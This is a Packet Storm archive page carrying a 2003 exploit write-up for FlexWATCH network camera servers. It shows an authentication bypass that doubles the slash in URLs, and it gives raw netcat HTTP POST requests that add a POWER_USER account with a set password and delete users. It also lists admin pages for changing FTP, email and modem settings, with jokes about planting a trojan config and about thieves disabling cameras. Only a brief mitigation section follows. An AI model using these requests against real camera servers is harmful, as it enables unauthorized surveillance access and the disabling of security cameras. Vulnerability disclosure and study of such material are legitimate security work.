what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FlexWATCH.txt

FlexWATCH.txt
Posted Oct 30, 2003
Authored by Slaizer

The FlexWATCH surveillance camera server is used by many banks and "secure" places and contains remotely exploitable vulnerabilities which allow remote attackers to view camera footage, add users, remove users, change the configuration, disable camera surveillance, and more.

tags | exploit, remote, vulnerability
SHA-256 | 4dfc8429dbb28abe088145db865dc9a76237fec3689cc388ec2968f37e7ed819

FlexWATCH.txt

Change Mirror Download


------------------ u0xa ------------------------
Author: SLAIZER
mail: slaizer[at]phreaker.net

Date: Sun/Oct/26/2003

-------"Another way of seeing the things"--------

-------------------------------------------------




Unauthorized access Vulnerability in FlexWATCH camera Server.
-----------------------------------------------------------

Vendor:
-------

·SEYEON Technology
·FlexWATCH Network Video Server
Url: http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr


Product:
--------

All versions web based configuration utility.
I tested on SYS_MODEL = 132

FlexWATCH is a Camera Server entrusted to centralize for Web Administration .
It´s very frequently used by safety companies , banks , parks and comercial centres.




Description :
-------------

[Necora@eviluser]$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80

HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <--- :)
Date: Sun Oct 26 02:15:07 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 0




*First:


For default , you can read the source at index page and see that :

<!-- You can modify here for user information. -->
<!-- ex) ID:guest, PASSWORD:guest -->

Many System Use this user and password , but that isn´t important .





I found that :

------------u0xa-----------

}
function adminTool(){ window.open("admin/aindex.htm","aindex","width=790,height=430,status=yes,resizable"); }

function select_sample()


------------u0xa-----------


<This is a autentification-javascript>

Url: admin/aindex.htm is a web based configuration .






*I read more source pages , and see :


-----------u0xa------------



<APPLET mayscript width=352 height=260 archive="stream.jar" codebase='/app/applet' code=StreamApplet.class name=StreamApplet>



-----------u0xa------------


ummMm I want read stream.jar :



[Necora@eviluser]$ jar xf stream.jar
-
META-INF/
META-INF/MANIFEST.MF
PrintfFormat$ConversionSpecification.class
CMsg.class
FInfo.class
StreamApplet.class
ImgCan.class
IMsg.class
JHCompr.class
JHEncry.class
JHManda.class
JHStand.class
LoginDlg.class <---- (C:
MIMEBase64.class <--- old friend :)
CgiQueryInfo.class
PrintfFormat.class
QueryMng.class
Semaphore.class
SingleCgi.class <----- For now any cgi-url
StrCan.class
StreamCgi.class <----- For now any cgi-url
StreamSocket.class
StreamThread.class
TCBack.class
Timer.class
-

·It´s enough to know how the system works , authoritation , cgi , crypt..



---------------------------




*Second seen http://victim/live.html

and find that :


------------u0xa------------


<script language = "JavaScript" src="sysinfo.js"></script>


------------u0xa------------




This contain info from the System :

//-- Model Information
SYS_MODEL = 132;
KERNEL_MAJORVER = 2;
KERNEL_MINORVER = 2;
IS_OEM = 0;
MODEL_NAME = "FLEXWATCH";

//-- For Administration
IS_ISDN = 0;
IS_LEASED = 1;
IS_AUDIO = 1;
IS_RTC = 1;
IS_RTC = "SAMSUNG";

//-- For Application
COUNT_CAM = 6;
COUNT_DI = 6;
COUNT_DO = 6;
VIDEO_FORMAT = 2;
TOTAL_FORMAT = 0x0007;
IS_PTZ = 1;

var CAM_NAME = new Array (6);
CAM_NAME[1] = "Office1";
CAM_NAME[2] = "Office2";
CAM_NAME[3] = "Office3";
CAM_NAME[4] = "4";
CAM_NAME[5] = "5";
CAM_NAME[6] = "6";

var PTZ_INSTALL = new Array (6);
PTZ_INSTALL[1] = 51;
PTZ_INSTALL[2] = 51;
PTZ_INSTALL[3] = 0;
PTZ_INSTALL[4] = 51;
PTZ_INSTALL[5] = 0;
PTZ_INSTALL[6] = 0;

-----------------------






*Some time ago , i read a Security Vulnerability in Boa , how can obtain access in privileged directory with '//'

Example :


http://victim//privileged.html <--- ok?





*The Access camera url :
------------------------


http://victim//app/sample/ab1.html



Wow! first access granted ! , now you have got identify in java-application .
But... why to search more there? if we can play with administration´s site o web, let´s try




http://victim//admin/aindex.htm <---- Interesting....





Now it´s very easy :D ,


·Add a User for view cameras :
------------------------------


http://victim//admin/asp/adduser.asp <---- Form <form action=/goform/AddUser method=POST>


[Necora@eviluser]$ nc victim 80


POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim//admin/asp/adduser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK

\n\n



**********************************************************************
-Wow! New user add : user= slaizer password= root123 group=POWER_USER*
**********************************************************************
*Note : Exist diferent Groups for add user : guest , User and Power_User .
At default only guest group can access remotely , you change this in :

http://victim//admin/asp/chglimit.asp






·How to delete user :
------------------

http://victim//admin/asp/deluser.asp


[Necora@eviluser]$nc victim 80

POST /goform/DeleteUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim//admin/asp/deluser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 90
Pragma: no-cache



RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&ok=OK

\n\n



**********************
-User slaizer deleted*
**********************


------------------------------------------------|
Now you have access to watch all cameras :-D ! |
Too you can reboot , edit configuration ... |
|
|
http://victim/app/sample/ab1.html |
|
-Login=slaizer password=root123- |
________________________________________________|



Examples :


·Configure e-mail adrees for send config :

http://victim//admin/fset/fset_email.htm



·Configure FTP for send a "evil-config" troyan-cgi/asp conf .. blah blah.

http://victim//admin/fset/fset_ftp.htm



·Edit modem configuration for phreakers :)

http://victim//admin/fset/fset_modem.htm



·CHange Camera Names xD Camera1=xD Camera2=rules! Camera3=AznarSucks!

http://victim//admin/aindex.htm



<Imagination , coffee and time.>






Possible solutions :
--------------------


·Activate the firewall to admit alone connections since the client that we want.

·Not to trust in the autentificacion on part of the client ( javascripts..)

·SEYEON invest in the safety ... a thief might use it to deactivate the cameras in a theft ...




************************
Greetz! :

:: gyorgyo :: overpower :: IsAhT :: phiber :: IaM :: zapper :: dreyer :: kanutron :: Makensi

:: TaYoKeN :: plAnadeCu :: AzTaGo :: gordenai ::


For aLL :
#boinasnegras #ngsec #drakulines #rmosc \\ Irc-Hispano \\

************************

*******************************
*Sorry for orthographic errors*
*******************************













Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close